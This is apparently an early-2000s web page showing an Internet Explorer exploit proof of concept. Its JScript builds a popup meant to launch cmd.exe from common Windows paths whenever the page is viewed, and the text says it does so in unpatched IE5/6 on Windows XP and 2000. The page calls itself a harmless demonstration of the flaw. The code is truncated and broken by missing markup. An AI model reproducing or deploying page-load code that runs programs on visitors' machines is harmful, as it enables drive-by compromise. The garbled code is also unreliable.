T language=JScript> var programName=new Array( 'c:/windows/system32/cmd.exe', 'c:/winnt/system32/cmd.exe', 'c:/cmd.exe' ); function Init(){ var oPopup=window.createPopup(); var oPopBody=oPopup.document.body; var n,html=''; for(n=0;n html+=""; oPopBody.innerHTML=html; oPopup.show(290, 190, 200, 200, document.body); }
Hmm, let's start a command shell...
This page doesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the marvelously secure Internet Explorer web browser!!
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There are currently no patches available using "Windows Update" which will prevent this.